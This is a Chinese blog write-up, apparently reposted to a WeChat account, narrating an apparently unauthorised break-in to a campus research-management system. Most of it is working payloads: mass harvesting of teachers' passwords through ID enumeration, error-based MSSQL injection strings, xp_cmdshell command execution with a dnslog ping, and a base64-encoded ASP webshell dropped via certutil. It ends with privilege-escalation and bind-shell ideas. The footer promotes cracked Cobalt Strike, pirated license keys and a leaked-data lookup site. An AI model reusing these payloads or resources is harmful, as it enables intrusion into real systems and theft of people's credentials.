记一次校内的XX系统渗透
首先进入主页是这个样子
F12
没找到啥接口。爆破也没出来。注入也无。。。。陷入僵局
然后继续翻 IP
。搜到一个人力资源管理系统
F12
有惊喜。这里背景图片居然是 download
+ id
然后顺势遍历一波 ID
。TM居然拿到了全校老师的账号密码?????
拿到账号密码。回去科研管理系统登陆一波
所有功能都点一遍。熟悉下环境
看这 URL
。。有点熟悉。这套系统还是 Asp
的。。后端应该就是 IIS
+ Asp
+ SqlServer
熟悉了下语句。后端应该是
select xxxx from xxxx where 1=1 +and+left(CheckResult,2)>=12++and+(*,*+AllUsers+*,*+like+*~,10432,~*+)+ and ProjLevel=*03*
上语句。看看能不能报错注入
成功带出数据
然后就查当前用户(dbo
),查库查表
# 查库
trWhere=1=convert(int,(db_name()))--
# 查版本信息
strWhere=1=convert(int,(@@version))--
# 获取数据库
strWhere=1=convert(int,(select name from master..sysdatabases for xml path))--
碰到 mssql
。那必得试一波 XP_CMDSHELL
😏
trWhere=1=0;exec master..xp_cmdshell 'whoami';--
没回显
用 dnslog
验证下
exec master..xp_cmdshell 'ping xxxxxxx';
发现 dnslog
能收到请求
然后继续搜文件。发现可以创建数据表。把 xp_cmdshell
的执行结果写入数据表
这个 web
。只能输出一条结果。而 Mssql
又没有 limit 1,1
这种具体读第 N条
数据的语句。只有 TOP 2
。返回两条数据,所以我们要通过 id
查询
# 创建一个自增表。等会就可以通过id去查询结果
trWhere=1=0;CREATE TABLE tt_tmp (id int identity(1,1),constraint pkid primary key (id),tmp1 varchar(8000));--
# 写入命令执行的结果
trWhere=1=0;insert into tt_tmp(tmp1) exec master..xp_cmdshell 'whoami';--
# 通过id查询
trWhere=1=(select tmp1 from tt_tmp where id=1)--
Mssql
的 xp_cmdshell
执行时。会把 \n
单独一行。。所以这里用 ID
具体查询
执行下 whoami
。发现是 System
权限。那么直接写个 webshell
之前用 certutil
请求 VPS
。没收到。DNS
也迷惑。感觉是不出网。学生网段和服务器网段也不能直通。。只想到写 shell
了
首先 dir c:\ D:\ e:\
,发现 e:\科研管理系统
感觉就是 web
目录。然而。。各种奇奇怪怪的编码问题。
这里一开始用的是
for /r e:\\ %i in (Login.aspx) do @echo %i
然后就可以列出 e:\
所有目录。一个个慢慢找咯
虽然找到了 Web
目录。我还是解决不了这个编码问题。进都进不去。那咋写 shell
正解:
URL
输入的是 UTF-8
。服务端却是 GBK
。所以需要转一下。解密后 URL
编码传入。这里感谢 123qwer
大师傅的指点
base64.b64encode("科研管理系统".encode("gbk"))
然后继续找啊找。发现了 web
目录
然后写 shell
又被恶心到了
xp_cmdshell
的单引号不解析我的 URL
编码,但是双引号解析????这我记得是浏览器会自动解析的啊。。
然后 asp
一句话又有单引号。尖括号特殊字符
<%eval request("pass")%>
这我直接自闭。整了半天。要么就是直接报错。要么就是写入的文件没引号了
最后想到看过的一篇文章。利用 certutil
转码写入文件
echo PCVleGVjdXRlKHJlcXVlc3QoInBhc3MiKSklPg== > web目录\sorry.txt
certutil -decode web目录\sorry.txt web目录\sorry.asp
直接用 base64
解码写入了。省去了很多烦恼
当我访问时。却是 500
??然后尝试用菜刀链接了下。居然可以连。。
之后就随便整了。Server2008
补丁很少。可以用 exp
直接提权。或者 xp_cmdshell
是 system
权限。传个 bind msf
马。xp_cmdshell
执行下我们去连就拿到 system
了
本文作者:Guoke
原文地址:https://guokeya.github.io/post/vEdQgLooM/
关注公众号后台回复 0001
领取域渗透思维导图,0002
领取VMware 17永久激活码,0003
获取SGK地址,0004
获取在线ChatGPT地址,0005
获取 Windows10渗透集成环境,0006
获取 CobaltStrike 4.9.1破解版
加我微信好友,邀请你进交流群
往期推荐
备用号,欢迎关注